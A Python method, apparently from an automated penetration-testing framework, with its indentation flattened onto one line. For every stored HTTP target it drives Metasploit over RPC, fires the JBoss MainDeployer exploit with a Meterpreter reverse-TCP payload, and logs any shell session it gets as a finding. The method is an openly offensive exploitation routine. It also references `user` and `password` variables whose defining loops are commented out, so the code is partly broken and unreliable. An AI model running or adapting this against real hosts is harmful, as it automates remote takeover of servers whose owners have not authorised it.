def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: #users = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username") #for user in users: # passwords = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username/" + user + "/password") # for password in passwords: # # verify we have not tested this host before # if not self.seentarget(t+p+user+password): # # add the new IP to the already seen list # self.addseentarget(t+p+user+password) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/multi/http/jboss_maindeployer\n") msf.execute("set RHOST %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("set SVHOST %s\n" % self.config['lhost']) # msf.execute("set httpusername %s\n" % user) # msf.execute("set httppassword %s\n" % password) msf.execute("set target 2") msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp") msf.execute("set LPORT 4445") msf.execute("set fingerprintcheck false\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln(t, self.shortName, {"port": p, "username": user, "password": password, "output": outfile.replace("/", "%2F")}) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) if callFire: self.fire("msfSession") # clean up after ourselves result = msf.cleanup() return